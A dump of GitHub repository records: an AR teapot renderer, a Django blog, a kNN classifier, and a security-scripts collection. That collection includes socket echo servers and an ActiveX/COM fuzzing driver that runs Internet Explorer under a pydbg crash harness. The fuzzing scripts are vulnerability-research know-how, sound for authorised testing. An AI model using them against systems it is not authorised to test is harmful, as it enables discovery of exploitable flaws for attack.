orb.detectAndCompute(query,None)\n kp2, des2 = orb.detectAndCompute(warpedScene,None)\n\n # create BFMatcher object\n bf = cv2.BFMatcher()\n #returns list of lists of matches\n matches = bf.knnMatch(des1,des2, k=2)\n\n # Apply ratio test\n good = []\n for m,n in matches:\n if m.distance < 0.75*n.distance:\n good.append([m])\n\n #drawMatches(img1, kp1, img2, kp2, good[:])\n\n MIN_MATCH_COUNT = 10\n if len(good)>MIN_MATCH_COUNT:\n src_pts = np.float32([ kp1[m[0].queryIdx].pt for m in good ]).reshape(-1,1,2)\n dst_pts = np.float32([ kp2[m[0].trainIdx].pt for m in good ]).reshape(-1,1,2)\n\n refinedM, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)\n matchesMask = mask.ravel().tolist()\n\n if refinedM is None:\n return None\n else:\n resultM = np.matmul(roughM, refinedM)\n '''\n '''\n\n h,w = query.shape\n pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)\n dst = cv2.perspectiveTransform(pts,resultM)\n\n corners = [np.int32(dst)]\n # draws the outline of the query img as it would be found in the scene\n #cv2.polylines(warpedScene,corners,True,255,3, cv2.CV_AA)\n\n\n else:\n print \"Not enough matches are found - %d/%d\" % (len(good),MIN_MATCH_COUNT)\n matchesMask = None\n return None\n\n\n #drawMatches(query,kp1,warpedScene,kp2,good[:])\n\n return (corners,resultM)\n\n\n\ndef draw_background(imname, sz):\n '''\n Draw background image using a quad. The quad is defined with corners at\n -1 and1 in both dimensions. Use this for translating object\n '''\n\n # load background image (should be .bmp) to OpenGL texture\n bg_image = pygame.image.load(imname).convert()\n bg_image = pygame.transform.scale(bg_image, sz)\n bg_data = pygame.image.tostring(bg_image,\"RGBX\",1)\n\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n # bind the texture\n glEnable(GL_TEXTURE_2D)\n glBindTexture(GL_TEXTURE_2D,glGenTextures(1))\n glTexImage2D(GL_TEXTURE_2D,0,GL_RGBA,sz[0],sz[1],0,GL_RGBA,GL_UNSIGNED_BYTE,bg_data)\n glTexParameterf(GL_TEXTURE_2D,GL_TEXTURE_MAG_FILTER,GL_NEAREST)\n glTexParameterf(GL_TEXTURE_2D,GL_TEXTURE_MIN_FILTER,GL_NEAREST)\n\n # create quad to fill the whole window\n glBegin(GL_QUADS)\n glTexCoord2f(0.0,0.0); glVertex3f(-1.0,-1.0,-1.0)\n glTexCoord2f(1.0,0.0); glVertex3f( 1.0,-1.0,-1.0)\n glTexCoord2f(1.0,1.0); glVertex3f( 1.0, 1.0,-1.0)\n glTexCoord2f(0.0,1.0); glVertex3f(-1.0, 1.0,-1.0)\n glEnd()\n\n # clear the texture\n glDeleteTextures(1)\n\n\ndef draw_teapot(size):\n '''\n Draw a red teapot at the origin.\n '''\n glEnable(GL_LIGHTING)\n glEnable(GL_LIGHT0)\n glEnable(GL_DEPTH_TEST)\n glClear(GL_DEPTH_BUFFER_BIT)\n\n # draw red teapot\n glMaterialfv(GL_FRONT,GL_AMBIENT,[0,0,0,0])\n glMaterialfv(GL_FRONT,GL_DIFFUSE,[0.5,0.0,0.0,0.0])\n glMaterialfv(GL_FRONT,GL_SPECULAR,[0.7,0.6,0.6,0.0])\n glMaterialf(GL_FRONT,GL_SHININESS,0.25*128.0)\n glutSolidTeapot(size)\n\ndef setup():\n '''\n Setup window and pygame environment.\n '''\n pygame.init()\n display = (800, 747)\n window = pygame.display.set_mode(display,DOUBLEBUF|OPENGL)\n return window\n\ndef my_calibration(sz):\n '''\n Calculate camera intrinsic parameters\n '''\n row,col = sz\n fx = 2555*col/col\n fy = 2586*row/row\n K = np.diag([fx,fy,1])\n K[0,2] = 0.5*col\n K[1,2] = 0.5*row\n return K\n\n\ndef set_projection_from_camera(K, sz, x, y, z):\n '''\n Translates the camera properties to an OpenGL projection matrix\n '''\n #matrix = cv2.calibrationMatrixValues(mtx, sz, aperture[0], aperture[1])\n\n # glMatrixMode() sets the working matrix to GL_PROJECTION\n # 
subsequent commands will modify this matrix\n glMatrixMode(GL_PROJECTION)\n # sets the matrix to the identity matrix, reseting any prior changes\n glLoadIdentity()\n\n # calculate the vertical field of view in degrees\n fx = K[0,0]\n fy = K[1,1]\n fovy = 2*np.arctan(0.5*sz[1]/fy)*sz[0]/np.pi\n aspect = (sz[0]*fy)/(sz[1]*fx)\n\n # define near and far clipping planes which limit depth range of what is rendered\n near = 0.1\n far = 100.0\n\n # set the projection matrix\n gluPerspective(fovy,aspect,near,far)\n # move object around view\n glTranslatef(x, y, z)\n # define the whole image to be the view port (essentially what is to be shown)\n glViewport(0,0,sz[0],sz[1])\n\n\ndef set_modelview_from_camera(Rt):\n '''\n Set the model view matrix from camera pose.\n '''\n\n # glMatrixMode() sets the working matrix to GL_MODELVIEW\n # subsequent commands will modify this matrix\n glMatrixMode(GL_MODELVIEW)\n # sets the matrix to the identity matrix, reseting any prior changes\n glLoadIdentity()\n\n # rotate teapot 90 deg around x-axis so that z-axis is up\n Rx = np.array([[1,0,0],[0,0,-1],[0,1,0]])\n\n # set rotation to best approximation\n R = Rt[:,:3]\n U,S,V = linalg.svd(R)\n R = np.dot(U,V)\n R[0,:] = -R[0,:] # change sign of x-axis\n\n # set translation\n t = Rt[:,3]\n\n # setup 4*4 model view matrix\n M = np.eye(4)\n M[:3,:3] = np.dot(R,Rx)\n M[:3,3] = t\n\n # transpose and flatten to get column order\n M = M.T\n m = M.flatten()\n\n # replace model view with the new matrix\n glLoadMatrixf(m)\n\n\ndef load_and_draw_model(filename):\n \"\"\"\n Loads a model from an .obj file using objloader.py.\n Assumes there is a .mtl material file with the same name.\n \"\"\"\n glEnable(GL_LIGHTING)\n glEnable(GL_LIGHT0)\n glEnable(GL_DEPTH_TEST)\n glClear(GL_DEPTH_BUFFER_BIT)\n\n # set model color\n glMaterialfv(GL_FRONT,GL_AMBIENT,[0,0,0,0])\n glMaterialfv(GL_FRONT,GL_DIFFUSE,[0.5,0.75,1.0,0.0])\n glMaterialf(GL_FRONT,GL_SHININESS,0.25*128.0)\n\n # load from a file\n import objloader\n obj = objloader.OBJ(filename,swapyz=True)\n glCallList(obj.gl_list)\n\n\ndef drawScene():\n cap = cv2.VideoCapture(0)\n while(cap.isOpened()):\n xaxis = 0\n yaxis = 0\n zaxis = 0\n ret, frame = cap.read()\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glLoadIdentity()\n glTranslatef(0.0,0.0,-7.0)\n glRotatef(x,1.0,0.0,0.0)\n glRotatef(y,0.0,1.0,0.0)\n glRotatef(z,0.0,0.0,1.0)\n\n x -= .30\n z -= 30\n\n glutSwapBuffers()\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\ndef initGl(width,height):\n glClearColor(0.0,0.0,0.0,0.0)\n glClearDepth(1.0)\n glDepthFunc(GL_LESS)\n glEnable(GL_DEPTH_TEST)\n glShadeModel(GL_SMOOTH)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(45.0, float(width)/float(height),0.1, 100.0)\n glMatrixMode(GL_MODELVIEW)\n\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n glEnable(GL_TEXTURE_2D)\n\ndef reshape(width, height):\n glViewport(0, 0, width, height)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(45.0, float(width)/float(height), 0.1, 100.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n gluLookAt(0.0, 0.0, 5.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0)\n\n###############################################################################\n###############################################################################\n'''\nTODO:\n - dynamic placement of objects\n - load 3d objects\n'''\n\n# construct the 
argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-s\", \"--sceneVideo\", required=True,\n\thelp=\"name of input video\")\nargs = vars(ap.parse_args())\n\nquery = None\nwindow = setup()\n\n# 1 = webcam\ncap = cv2.VideoCapture(\"imgs/\" + args[\"sceneVideo\"])\nwhile(cap.isOpened()):\n ret, scene = cap.read()\n\n '''\n Feature matching\n '''\n if query is None:\n # extract receipt from the scene\n transformSurface(scene)\n\n query = \"imgs/query.jpg\"\n #scene = \"imgs/\"+args[\"sceneImage\"]\n\n\n gray = cv2.cvtColor(scene,cv2.COLOR_BGR2GRAY)\n imHeight, imWidth = gray.shape[:2]\n\n # perform feature matching and calculate homography\n corners = orb(query,scene)\n if corners is None:\n continue\n else:\n homography = corners[1]\n '''\n '''\n\n '''\n Calibration\n '''\n # calibrations = np.load(\"calibrate.npz\")\n # mtx = calibrations['mtx'] #camera intrinsic parameters\n # dist = calibrations['dist']\n # rvecs = calibrations['rvecs']\n # tvecs = calibrations['tvecs']\n\n\n # intrinsic matrix K\n K = my_calibration((imWidth, imHeight))\n\n # camera matrix for query image\n cam1 = Camera( np.hstack((K,np.dot(K,np.array([[0],[0],[-1]])) )) )\n # camera matrix for scene image\n cam2 = Camera(np.dot(homography,cam1.P))\n\n # The first two columns and the fourth column of cam2.P are correct.\n # Since we know that the first 3x3 block should be KR and R is a rotation matrix,\n # we can correct the third column by multiplying cam2.P with the inverse of the\n # calibration matrix and replacing the third column with the cross product of the first two.\n A = np.dot(linalg.inv(K),cam2.P[:,:3])\n A = np.array([A[:,0],A[:,1],np.cross(A[:,0],A[:,1])]).T\n\n # camera pose [R|t]\n cam2.P[:,:3] = np.dot(K,A)\n Rt = np.dot(linalg.inv(K),cam2.P)\n '''\n '''\n\n '''\n 3d rendering\n '''\n # make .bmp file of scene for OpenGL\n cv2.imwrite( 'imgs/3dpoint.bmp', scene)\n\n #render object\n sz = (800, 747)\n draw_background(\"imgs/3dpoint.bmp\", sz)\n # repeat next three lines to render multiple objs\n # changing the 3 decimal values to the position of choice\n set_projection_from_camera(K,sz, 0.0, 0.0, 0.0)\n set_modelview_from_camera(Rt)\n #load_and_draw_model('toyplane.obj')\n draw_teapot(0.09)\n\n event = pygame.event.poll()\n if event.type in (QUIT,KEYDOWN):\n break\n pygame.display.flip()\n pygame.time.wait(1)\n\n\n cv2.imshow('frame',scene)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n" } ]
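Editor's note: the Markerless-AR README in the record above describes recovering the camera extrinsics [R|t] from a planar homography and the intrinsic matrix K. As a standalone illustration of that step — not code from the repository — here is a minimal NumPy sketch; the name `decompose_pose` and its arguments are hypothetical, and it assumes K is a 3x3 intrinsic matrix and H a 3x3 homography (e.g. from `cv2.findHomography`).

```python
# Minimal sketch (illustrative assumption, not the repository's code):
# recover a 3x4 extrinsic matrix [R|t] from an intrinsic matrix K and a
# planar homography H.
import numpy as np

def decompose_pose(K, H):
    # Strip the intrinsics: for a planar target, the columns of A
    # approximate [r1, r2, t] up to a common scale factor.
    A = np.linalg.inv(K) @ H
    scale = 1.0 / np.linalg.norm(A[:, 0])   # recover the scale from column 1
    r1, r2, t = scale * A[:, 0], scale * A[:, 1], scale * A[:, 2]
    r3 = np.cross(r1, r2)                   # third axis from orthogonality
    R = np.column_stack([r1, r2, r3])
    U, _, Vt = np.linalg.svd(R)             # snap to the nearest true rotation
    return np.column_stack([U @ Vt, t])     # 3x4 extrinsic matrix [R|t]
```

The SVD projection at the end mirrors the "set rotation to best approximation" step that `set_modelview_from_camera` in the archived `arVideo.py` performs before handing the pose to OpenGL.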
2
dongjun2000/blogproject
https://github.com/dongjun2000/blogproject
a540cd8895f3c639b770d0848c045283c4fd8e46
de133c411511d115dd497675cb6f990d19848689
fb95e2b212925bd9cc5f21f15eff9b9b48a171e1
refs/heads/master
2018-12-19T16:03:47.796510
2018-09-17T07:16:35
2018-09-17T07:16:35
148,977,715
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6345177888870239, "alphanum_fraction": 0.6446700692176819, "avg_line_length": 27.14285659790039, "blob_id": "4b1c8bde4fb7271d215a00b0558d8015c9897430", "content_id": "ccc92caa0366927a3a3037b06903e867a35280e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 197, "license_type": "no_license", "max_line_length": 76, "num_lines": 7, "path": "/blog/urls.py", "repo_name": "dongjun2000/blogproject", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='blog_index'),\n url(r'^article/(?P<blog_id>[0-9]+)', views.article, name='blog_article')\n]\n" }, { "alpha_fraction": 0.7563636302947998, "alphanum_fraction": 0.7563636302947998, "avg_line_length": 29.55555534362793, "blob_id": "8775b993c87768bda99db02134e34eeba938d1e3", "content_id": "c70aff01ba1e4f1cc42144ecacb2cfda425a9624", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 83, "num_lines": 9, "path": "/blog/admin.py", "repo_name": "dongjun2000/blogproject", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom . import models\n\nadmin.site.register(models.Category)\nadmin.site.register(models.Tag)\n\[email protected](models.Entry)\nclass EntryAdmin(admin.ModelAdmin):\n list_display = ['title', 'author', 'visiting', 'created_time', 'modifyed_time']\n" }, { "alpha_fraction": 0.6711185574531555, "alphanum_fraction": 0.6727879643440247, "avg_line_length": 25.04347801208496, "blob_id": "0460939f253f18a78e2f47c61a2246742cb143fc", "content_id": "6d1af1eab0a7df6c7313d3c071e170d081f3895c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 603, "license_type": "no_license", "max_line_length": 52, "num_lines": 23, "path": "/blog/views.py", "repo_name": "dongjun2000/blogproject", "src_encoding": "UTF-8", "text": "import markdown, pygments\n\nfrom django.shortcuts import render\nfrom . import models\n\ndef index(request):\n entries = models.Entry.objects.all()\n\n return render(request, 'index.html', locals())\n\n\ndef article(request, blog_id):\n entry = models.Entry.objects.get(id=blog_id)\n md = markdown.Markdown(extensions=[\n 'markdown.extensions.extra',\n 'markdown.extensions.codehilite',\n 'markdown.extensions.toc',\n ])\n entry.body = md.convert(entry.body)\n entry.toc = md.toc\n # 访客 +1\n entry.increase_visiting()\n return render(request, 'article.html', locals())\n" } ]
3
ankitsharma1999/kNN
https://github.com/ankitsharma1999/kNN
c866325b8c3a66629d3d86c39d27682f82a86011
70870a249e219ef787bc60c4fc62a95c257cbbb2
43866d608de787d4a14f06872c598bec0617ec18
refs/heads/master
2020-07-24T19:30:57.260274
2019-09-12T10:30:04
2019-09-12T10:30:04
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8103448152542114, "alphanum_fraction": 0.8103448152542114, "avg_line_length": 28, "blob_id": "d1853cc9d14bbcb5de3522d90608cd1bbceecb97", "content_id": "cbcce356df7e952d90c44995c737b2f36d467b0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 58, "license_type": "no_license", "max_line_length": 51, "num_lines": 2, "path": "/README.md", "repo_name": "ankitsharma1999/kNN", "src_encoding": "UTF-8", "text": "# kNN\nA simple python script depicting the kNN classifier\n" }, { "alpha_fraction": 0.33203125, "alphanum_fraction": 0.4921875, "avg_line_length": 18.69230842590332, "blob_id": "790794ac2c77237c619c27a399bb1eaf357440cd", "content_id": "60d2d35741175459810ab611d2120095a5c44d57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 256, "license_type": "no_license", "max_line_length": 42, "num_lines": 13, "path": "/main.py", "repo_name": "ankitsharma1999/kNN", "src_encoding": "UTF-8", "text": "from mains import kNN\n\nX = [1, 1.5, 2, 2.5, 3, 5, 5.5, 6, 6.5, 7]\ny = [2, 2.5, 3, 1, 1.5, 6, 6.5, 7, 5, 5.5]\n\nX_train = list(zip(X, y))\ny_train = [0, 0, 0, 0, 0, 1, 1, 1, 1, 1]\n\nclf = kNN(X_train, y_train, k=5)\n\nx_test = [1, 5]\n\nprint(clf.predict(x_test))\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.5867347121238708, "avg_line_length": 19.102563858032227, "blob_id": "656ecca87ece909bb936bb9f628f5ee38075235b", "content_id": "fd0222a3895c6a1f73220c8ac8bfe3d440604010", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 784, "license_type": "no_license", "max_line_length": 69, "num_lines": 39, "path": "/mains.py", "repo_name": "ankitsharma1999/kNN", "src_encoding": "UTF-8", "text": "class kNN:\n\t\n\tdef __init__(self, x_train, y_train, k=5):\n\t\tself.k = k\n\t\tself.x_train = x_train\n\t\tself.y_train = y_train\n\t\n\tdef predict(self, x_test):\n\t\t\n\t\tdist = self.distance(self.x_train, x_test)\n\t\tlabels = self.y_train\n\t\t\n\t\tdist, labels = zip(*sorted(zip(dist, labels)))\n\t\ttop_k_entries = labels[0:self.k]\n\t\tclasses = self.unique(top_k_entries)\n\t\t\n\t\tpred = max(set(classes), key=classes.count)\n\t\treturn pred\n\t\n\tdef distance(self, x_train, x_test):\n\t\t\n\t\tdist = []\n\t\tx = x_test[0]\n\t\ty = x_test[1]\n\t\tfor j in range(len(x_train)):\n\t\t\td = (((x_train[j][0] - x) ** 2) + ((x_train[j][1] - y) ** 2))**0.5\n\t\t\tdist.append(d)\n\t\t\n\t\treturn dist\n\t\n\tdef unique(self, list1):\n\t\t\n\t\tunique_list = []\n\t\t\n\t\tfor x in list1:\n\t\t\tif x not in unique_list:\n\t\t\t\tunique_list.append(x)\n\t\t\n\t\treturn unique_list\n" } ]
3
ma11ock/sec_scripts
https://github.com/ma11ock/sec_scripts
b48c6c52ad763b3ac3035b7354800b615a9cd1ea
3c86205381eedf7a31ff1f4cd7d30a80c939227e
fb8171044002b5f5965b929092e5dee756a0e861
refs/heads/master
2020-12-11T21:27:48.323058
2018-03-23T17:26:47
2018-03-23T17:26:47
41,444,071
5
5
null
null
null
null
null
[ { "alpha_fraction": 0.6376811861991882, "alphanum_fraction": 0.6811594367027283, "avg_line_length": 18.785715103149414, "blob_id": "7e5d80667d2b0f277a899aab86687d7bb52d7c2f", "content_id": "ed9aea61767a42ca2d8c36cf151373a04da3a87d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 276, "license_type": "no_license", "max_line_length": 56, "num_lines": 14, "path": "/python/Module-3/client.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\nimport socket, sys\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((sys.argv[1], 8000))\n\nwhile 1:\n userInput = input(\"please enter a string: \")\n sock.send(userInput)\n print sock.recv(2048)\n\nsock.close()" }, { "alpha_fraction": 0.36675822734832764, "alphanum_fraction": 0.44505494832992554, "avg_line_length": 25.925926208496094, "blob_id": "390e97be4f7743ee8d46170d9bfc5a20a5ed0fd5", "content_id": "2583346a2c3c19f347a0793a2f2a8e94cce2b7d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 728, "license_type": "no_license", "max_line_length": 131, "num_lines": 27, "path": "/ruby/buzzyfizzy.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "for i in 1..100 do\n print \"#{i.to_s}:\"\n if i % 5 == 0 && i % 3 == 0\n puts \"fizzbuzz\"\n elsif i % 3 == 0\n puts \"fizz\"\n elsif i % 5 == 0\n puts \"buzz\"\n end\nend\n\n1.upto(100) do |num|\n puts num.to_s\n if num % 15 == 0\n puts \"fizzbuzz\"\n elsif num % 3 == 0\n puts \"fizz\"\n elsif num % 5 == 0\n puts \"buzz\"\n end\nend\n\n(1..100).each{|num| puts num.to_s + \" : \" + (num % 15 == 0 ? \"fizzbuzz\" : (num % 3 == 0 ? \"fizz\" : (num % 5 == 0 ? \"buzz\" : \"\")))}\n\n1.upto(100) {|num| puts num.to_s + \" : \" + (num % 15 == 0 ? \"fizzbuzz\" : (num % 3 == 0 ? \"fizz\" : (num % 5 == 0 ? \"buzz\" : \"\")))}\n\n1.step(100,1) {|num| puts num.to_s + \" : \" + (num % 15 == 0 ? \"fizzbuzz\" : (num % 3 == 0 ? \"fizz\" : (num % 5 == 0 ? 
\"buzz\" : \"\")))}\n\n" }, { "alpha_fraction": 0.5875641703605652, "alphanum_fraction": 0.600114107131958, "avg_line_length": 28.233333587646484, "blob_id": "787b64a24e6aa405501f7f85c775539b6b66a9fc", "content_id": "317dd660517842da615bcd472100b16302e5f91c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1753, "license_type": "no_license", "max_line_length": 186, "num_lines": 60, "path": "/FaX/html/comfuzz.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n__author__ = 'm4lefic'\n\n# this is the User run script that finds all clsids for newly installed software\n\nimport sys, subprocess, os, comfuncs\nfrom comfuncs import *\n\nroot = 'C:\\\\fuzzer\\\\'\naxman_path = 'C:\\\\fuzzer\\\\axman\\\\bin'\nsave_dir = 'C:\\\\fuzzer\\\\html\\\\conf'\njs_file_folder1 = 'C:\\\\fuzzer\\\\axman\\\\bin\\\\js_folder1'\njs_file_folder2 = 'C:\\\\fuzzer\\\\axman\\\\bin\\\\js_folder2'\n\n\ndef create_files():\n\t\n\ttry:\n\t\tif sys.argv[1] == \"BASELINE\":\n\t\t\tbaseline_generate(axman_path, js_file_folder1)\n\t\t\tprint \"[+] completed - reboot\"\n\t\t\texit(0)\n\t\telif sys.argv[1] == \"-f\":\n\t\t\tpass\n\t\telif sys.argv[1] == \"TARGET\":\n\t\t\tdiff_generate(axman_path, js_file_folder1, js_file_folder2, save_dir)\n\t\t\tprint \"[+] completed - reboot\"\n\t\t\texit(0)\n\texcept:\n\t\tprint \"-------------------------\"\n\t\tprint \"[1] comfuzz.py BASELINE \"\n\t\tprint \"-------------------------\"\n\t\tprint \"[2] comfuzz.py TARGET \"\n\t\tprint \"-------------------------\"\n\t\tprint \"[3] comfuzz.py -f \"\n\t\tprint \"-------------------------\"\n\t\texit(0)\n\ndef execute():\n\tclsid=\"\"\n\tcreate_files()\t\n\tsubprocess.Popen(['python',root+'tcpserver.py'])\n\n\tfor files in os.listdir(save_dir):\n\t\tif match_clsid_pattern(files):\n\t\t\tclsid = files[0:-3]\n\n\t\tprint \"[+] Fuzzing \", clsid\n\t\tsubprocess.call(['python',root+'html\\\\pydbg_script.py', 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe',root+'html\\\\index.html', root+'log', '600', 'Fuzzing Media Player', clsid])\n\t\t#remove clsid from list in objects.js so we skip for next fuzzing iteration \n\t\t#revisit to blacklist ID - better solution\n\t\tf = open(\"conf/objects.js\",'r')\n\t\tfiledata = f.read()\n\t\tf.close()\n\t\tnewdata = filedata.replace(\",\\n'\"+clsid+\"'\",\"\")\n\t\tf = open(\"conf/objects.js\",'w')\n\t\tf.write(newdata)\n\t\tf.close()\n\nexecute()" }, { "alpha_fraction": 0.5946666598320007, "alphanum_fraction": 0.6026666760444641, "avg_line_length": 16.090909957885742, "blob_id": "94c57e7235392e477b15022f34a58597c916af43", "content_id": "e245bcd158d97ee03b4194399ef94226b43532e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 375, "license_type": "no_license", "max_line_length": 36, "num_lines": 22, "path": "/python/getmodules", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nDESC=\"DUMP MODULES\"\n\nimport immlib\n\ndef main(args):\n ins=immlib.Debugger()\n ins.ps()\n ins.run()\n psList=ins.ps()\n\n moduleList=ins.getAllModules()\n\n for process in psList:\n if process[1] == 'iexplore':\n ins.Attach(process[0])\n\n for element in moduleList\n ins.log(element[0])\n\n return \"[+] MODULES LOGGED\"" }, { "alpha_fraction": 0.6144994497299194, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 22.405405044555664, "blob_id": "c879265e59b171674f540ad0b5d5d3062123a7cb", "content_id": 
"04075b26e4c2be4d34c0d782aa214cc58dc00ceb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 869, "license_type": "no_license", "max_line_length": 62, "num_lines": 37, "path": "/python/Module-3/multiechoserver.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\nimport threading, socket, time\n\n\ntcpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n# allow address to be re-used\ntcpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)\ntcpSocket.bind((\"0.0.0.0\", 8000))\ntcpSocket.listen(2)\nprint \"Waiting for a Client ..\"\n\n\ndef echo_server(id):\n (client, (ip, port)) = tcpSocket.accept()\n\n print \"rcvd connection from : \", ip\n print \"starting echo output ...\"\n time.sleep(2)\n data = 'dummy'\n\n while len(data):\n data = client.recv(2048)\n print threading.current_thread()\n print \"ID = %d \" %id\n print ip, \" sent: \", data\n client.send(data)\n\n client.close()\n\nthreads = list()\nfor i in range(2):\n thread = threading.Thread(target=echo_server, args=(i,))\n thread.start()\n time.sleep(2)\n threads.append(thread)\n\n\n\n" }, { "alpha_fraction": 0.6795580387115479, "alphanum_fraction": 0.6906077265739441, "avg_line_length": 11.133333206176758, "blob_id": "c8e6daa6da6dd4af5f2145bad648a762bc37cc16", "content_id": "37021dcdda039bc428ee87696f30b830703fb741", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 181, "license_type": "no_license", "max_line_length": 36, "num_lines": 15, "path": "/ruby/psFund/varNilMethodsScope.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "res = nil\np res.nil?\n\ndef double(var)\n p var * 2\nend\n\n# access sys launch separate process\nputs \"backticks dd\"\nputs `date`\nputs %x(date)\nputs system \"date\"\n\ndouble(2)\ndouble(\"bye\")" }, { "alpha_fraction": 0.6481440663337708, "alphanum_fraction": 0.6531956791877747, "avg_line_length": 22.474225997924805, "blob_id": "37ca0eadc24cd985c45579cad98e3ad8a8e65ef8", "content_id": "c683549031e309467db7f155ea449c21e43ddcaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 4553, "license_type": "no_license", "max_line_length": 113, "num_lines": 194, "path": "/ruby/psFund/blocksConstantsModules.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "# BLOCKS\n#\n# [1,2,3].each do\n# puts \"stuff\"\n# end\n#\n# [1,2,3].each{|num|puts num}\n#\n# class Spaceship\n# def debug_only\n# return nil unless @debug\n# reuturn nil unless block_given?\n# puts \"running code...\"\n# yield @debug_attrs # if debug requires args pass to yeild\n# end\n# end\n#\n# ship.debug_only # does nothing\n# ship.debug_only do\n# puts \"This is debug output\"\n# end\n#\n# ship.debug_only do |attrs|\n# puts \"Debug attr values : #{attrs.inspect}\"\n# end\n\n# BLOCK LOCAL VARS\n#\n# $debug = true\n#\n# def debug_only\n# yield if $debug && block_given?\n# end\n#\n# class Spaceship\n# def initialize\n# @debug_attrs = {containment_status: :ok, core_temp: 350}\n# end\n#\n# def launch\n# debug_only {p @debug_attrs }\n# end\n#\n# end\n#\n# Spaceship.new.launch\n\n# executes start time, then exec block, then calc time taken to exec block\n\n# def with_timing\n# start = Time.now\n# if block_given?\n# yield\n# puts \"Time taken: #{Time.now - start} sec\"\n# end\n# end\n#\n# # code to operate\n#\n# def operation_1\n# sleep(1)\n# end\n#\n# def operation_2; 
end\n#\n# with_timing do\n# operation_1\n# operation_2\n# end\n\n# PROCS - can give block a name in param list - convert block into obj\n#\n# def debug_only(param = nil, &block)\n# puts \"Param class: #{param.class}\" #NilClass\n# puts \"Block class: #{block.class}\" if block_given? #Proc\n# end\n#\n# debug_only{}\n# puts \"---\"\n# p = Proc.new {|bla| puts \"I'm a proc that says #{bla}!\"}\n# p = proc {|blah| puts \"I'm a proc that says #{bla}!\"}\n#\n# #call\n# p.call \"woot!\"\n# p.yield \"wootwoot\"\n# p.(\"nowoot\")\n# p[\"wootz\"]\n#\n# debug_only(p)_\n# puts \"---\"\n# debug_only(&p)\n\n# LAMBDAS\n# convert block into obj converts block into proc\n\n# lmb = lambda {|bla| \"I'm also a proc, and I say #{bla}\"}\n# also_lmb = ->(blah){ \"I'm also a proc, and I say #{bla}\"}\n\n# Differences\n# Procs behave like Blocks - allow you to drop code into a method, but with more flexibility bc they are named\n# can be passed around like reg obj\n\n# lambdas are like anyonymous methods, are strict about args\n# diff in arg handling - lambdas - too many or too few args cause an exception, Procs - extra args discarded\n# missing args set to nil\n# diff in return and break handling - procs - return is executed in the scope where block was def\n# procs - break isn't allowed outside a loop -- shouldn't use return or break in procs - should try to avoid\n# return in blocks too\n# lambdas - break and return both return control to the calling method\n\n# check args expected\n# proc {|a, b|}.arity\n# # if arg is optional returns non optional args + 1 & then converts to -\n# proc {|a, *b, c|}.arity\n#\n# # symbol to proc conversion\n# def debug_only(param = nil, &block)\n# puts \"Param class: #{param.class}\"\n# puts \"Block class: #{block.class}\" if block_given?\n# end\n\n# debug_only(p) # param == p\n# debug_only(&p) # param == nil, block == p tells ruby to treat as block & tries to coerce obj into proc\n#\n# names = [\"jabby\",\"doot\",\"lokiri\"]\n# up_name = names.map{|name|name.upcase}\n#\n# # instead of passing block we can give it a symbol and tell it to treat as block - if not proc will cal to_proc\n# up_name = 